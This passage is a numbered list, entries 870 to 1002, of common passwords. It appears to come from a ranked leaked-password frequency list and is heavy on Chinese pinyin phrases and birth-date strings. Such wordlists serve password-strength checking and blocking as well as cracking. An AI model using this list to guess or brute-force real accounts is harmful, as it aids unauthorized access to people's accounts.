870 | tianya 871 | 123aaa 872 | 111aaa 873 | 123456789aaa 874 | 8008208820 875 | 123123q 876 | football 877 | dandan 878 | www123456789 879 | 19861026 880 | qingqing 881 | 315315 882 | 1111122222 883 | 171204jg 884 | 19861021 885 | 5555555 886 | AS123456789 887 | qqqwww 888 | 19861024 889 | yahoo.com 890 | 19861225 891 | 1qaz1qaz 892 | 19871010 893 | 1029384756 894 | 123258 895 | zxcv123 896 | 19861123 897 | 1314520. 898 | aidejiushini 899 | 123qwe123 900 | 198711 901 | operation 902 | 19861025 903 | yu123456 904 | 19851225 905 | wangshuai 906 | 19841015 907 | 520521 908 | wangyan 909 | 19861011 910 | 7007 911 | 123456zz 912 | 521000 913 | 198311 914 | 299792458 915 | 112211 916 | ****** 917 | 00000 918 | qwer123 919 | 51201314 920 | qazwsxedcrfv 921 | LOVE5201314 922 | 198312 923 | 198510 924 | 888888888 925 | 1314521521 926 | internet 927 | z123123 928 | a147258 929 | 696969 930 | 1234321 931 | 476730751 932 | 5201314789 933 | 012345 934 | 19861022 935 | welcome 936 | aqwe518951 937 | 19861121 938 | HUANGwei 939 | 868686 940 | wanghao 941 | NIAIWOMA 942 | xiaojian 943 | 19851120 944 | 19851212 945 | 100000 946 | 19841022 947 | zhangbin 948 | shadow 949 | mmmmmm 950 | 000... 951 | 1357913579 952 | 77585217758521 953 | 19861216 954 | 19841016 955 | az123456 956 | zxcv1234 957 | 19841023 958 | wu123456 959 | 163163 960 | 2008520085 961 | pppppp 962 | 789654123 963 | EtnXtxSa65 964 | 19851025 965 | woaiwolaopo 966 | ww111111 967 | woaini110 968 | 123455 969 | 19841026 970 | 19881010 971 | www163com 972 | 159357456 973 | fangfang 974 | 19851015 975 | 19861013 976 | 19861220 977 | 12312 978 | 19861018 979 | 19861028 980 | a11111111 981 | 19841018 982 | 119911 983 | AI123456 984 | 198211 985 | 55555 986 | zhangkai 987 | wangxin 988 | xihuanni 989 | 19871024 990 | 19861218 991 | 16899168 992 | 1010110 993 | nimabi 994 | 19861125 995 | 52013143344 996 | 131452000 997 | 19871020 998 | freedom 999 | baobao520 1000 | winner 1001 | 123456m 1002 | 12312312 --------------------------------------------------------------------------------